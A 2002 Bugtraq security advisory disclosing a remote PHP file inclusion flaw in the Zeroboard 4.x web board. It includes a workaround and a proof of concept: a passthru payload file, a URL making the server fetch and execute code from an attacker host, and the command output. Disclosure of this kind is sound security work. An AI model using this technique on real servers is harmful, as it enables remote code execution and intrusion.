[25802] in bugtraq
malicious PHP source injection
daemon@ATHENA.MIT.EDU (I'm I)
Sat Jun 15 12:24:29 2002
From: "I'm I" <onlooker@cnun.xsdeny.net>
Date: Sun, 16 Jun 2002 01:15:15 +0900
To: bugtraq@securityfocus.com
Message-ID: <20020615161515.GA18672@xsdeny.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
JCC Security Advisory
June 15, 2002
malicious PHP source injection
Description
Zeroboard is one of popular PHP web boards in Korea.
When allow_url_fopen = On and register_globals = On in php.ini,
Zeroboard has vulnerability because _head.php contains dangerous codes.
So an attacker can include any files into server's PHP codes.
Impact
All versions of Zeroboard 4.x.
Workaround
allow_url_fopen = off and register_globals = off.
Tested systems
Zeroboard 4.1pl2 Debian GNU/Linux SID(x86)
Background
We checked the vulnerability with "http://BOARD_URL/_head.php?_zb_path=WANTED_TO_INCLUDE" and
made a sample code, alib.php,
--------------------alib.php--------------
<? passthru("/bin/ls"); ?>
-----------------------------------------
and type the following URL to invoke this sample code.
TEST URL : http://BOARD_URL/_head.php?_zb_path=http://MYBOX/a"
-------out put----------------------------
_foot.php _head.php admin admin.php admin_sendmail_ok.php admin_setup.php apply_vote.php check_user_id.php comment_ok.php config.php data del_comment.php del_comment_ok.php delete.php delete_ok.php download.php error.php icon image_box.php images include index.html install.php install1.php install2.php install2_ok.php install_ok.php latest_skin lib.php license.txt list_all.php login.php login_check.php logout.php lostid.php lostid_search.php member_join.php member_join_ok.php member_memo.php member_memo2.php member_memo3.php member_modify.php member_modify_ok.php member_out.php open_window.php outlogin.php outlogin_skin schema.sql script select_list_all.php send_message.php setup.php skin style.css view.php view_info.php view_info2.php view_preview.php vote.php write.php write_ok.php zboard.php zipcode
Fatal error: Call to undefined function: dbconn() in /home/morris/public_html/tmp/bbs/_head.php on line 41
-----------------------------------------
thx for BlackNight at r0ar
---
http://jcc.hackerslab.org(at morris Chang)
e-mail : morris@xsdeny.net
